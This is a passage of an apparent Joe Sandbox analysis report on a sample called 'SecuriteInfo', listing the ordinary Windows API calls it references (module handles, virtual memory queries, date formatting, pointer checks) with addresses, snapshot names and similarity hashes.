
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0282A10B,00000000,0282A11E), ref: 0280C436
                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0280C447
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                  • API String ID: 1646373207-3712701948
                  • Opcode ID: 45097e2da536026ad41ef37f34dfb403713bb50e68a5196bf49c544429ff3517
                  • Instruction ID: 81bc2fa0f978e9481d89c61dba0002c43461ff16c97271b6481107432b80ace5
                  • Opcode Fuzzy Hash: 45097e2da536026ad41ef37f34dfb403713bb50e68a5196bf49c544429ff3517
                  • Instruction Fuzzy Hash: 92D0A77CA827954EFB90AEF55CC073523D8A70474AF00CA2BE209D62C2D7B584288F52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0280E253
                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0280E26F
                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0280E2E6
                  • VariantClear.OLEAUT32(?), ref: 0280E30F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ArraySafe$Bound$ClearIndexVariant
                  • String ID:
                  • API String ID: 920484758-0
                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                  • Instruction ID: 3e5065364aca5fdffdb5b6d6608f0d01f2cd1de61d4b672f725f521f69f45aec
                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                  • Instruction Fuzzy Hash: AC41E77DA012199FCBA1DB98CCD0BCAB7BDAB49304F0045D5E548E7291DB30AF808F51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0280AD15
                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0280AD39
                  • GetModuleFileNameA.KERNEL32(02800000,?,00000105), ref: 0280AD54
                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0280ADEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileModuleName$LoadQueryStringVirtual
                  • String ID:
                  • API String ID: 3990497365-0
                  • Opcode ID: 4a8937deb614c3ef7a7382aa83565ad3a75fa7d0bd3f3b2af84db6eb5e235682
                  • Instruction ID: 81f5561c2903399ca81dd567373b39ef319931be3a18175746d1826fdf0d428d
                  • Opcode Fuzzy Hash: 4a8937deb614c3ef7a7382aa83565ad3a75fa7d0bd3f3b2af84db6eb5e235682
                  • Instruction Fuzzy Hash: 4D411C7DA003589BDBA1DB68CCC4BDEB7EDAB08341F4040E5A648E7291DB74AF948F51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0280AD15
                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0280AD39
                  • GetModuleFileNameA.KERNEL32(02800000,?,00000105), ref: 0280AD54
                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0280ADEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileModuleName$LoadQueryStringVirtual
                  • String ID:
                  • API String ID: 3990497365-0
                  • Opcode ID: 133b6527ffd90f8f6c042cd33ccbcfe9259781161894556c2d9dfe41ac4648ae
                  • Instruction ID: 06e7749a9e813abc65b0bd05a459d0b2a63c8d8f90869ce99c102ebbc78805c9
                  • Opcode Fuzzy Hash: 133b6527ffd90f8f6c042cd33ccbcfe9259781161894556c2d9dfe41ac4648ae
                  • Instruction Fuzzy Hash: 06411D7DA002589BDBA1DB68CCC4BDAB7EDAB08341F4040E5A648E7291DB74AF948F51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8872c1ffe950a1953baf5c473ccfe59089c2a832431f33fda1a6234782d8450
                  • Instruction ID: aba95e5dc8640ed56cdbaf736525d90e442be47b546a0ad2c925089408d47084
                  • Opcode Fuzzy Hash: f8872c1ffe950a1953baf5c473ccfe59089c2a832431f33fda1a6234782d8450
                  • Instruction Fuzzy Hash: 16A1E3AE7106000BE798AA7C9CCC3ADB3C29BC4335F18827EE51DCB7C5EB64D9518651
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02809596), ref: 0280952E
                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02809596), ref: 02809534
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: DateFormatLocaleThread
                  • String ID: yyyy
                  • API String ID: 3303714858-3145165042
                  • Opcode ID: f41f2c9992bcc298067256af694700b1de552d4c2cb461eb98a1684d7296bc4f
                  • Instruction ID: a30a2b67f8255a25eb6e635e80e1033b2db7007881a8d33860fef26ba6182dea
                  • Opcode Fuzzy Hash: f41f2c9992bcc298067256af694700b1de552d4c2cb461eb98a1684d7296bc4f
                  • Instruction Fuzzy Hash: EF21717DA012189BDB50DF69CCC1AAEB3B9EF48710F4100A5E905E72D1E6309E44CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02819FD0
                  • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0281A000
                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 0281A01F
                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0281A02B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Read$Write
                  • String ID:
                  • API String ID: 3448952669-0
                  • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                  • Instruction ID: 5cacab8e4ddcf49c87a6735f4f8015380f6912bd60da19e1d8baa8d02bd762a7
                  • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                  • Instruction Fuzzy Hash: A621907D641219DBDB14CE69CC80BAE73ADEF84765F048515EE14D73C1E734E811CAA4
                  Uniqueness

                  Uniqueness Score: -1.00%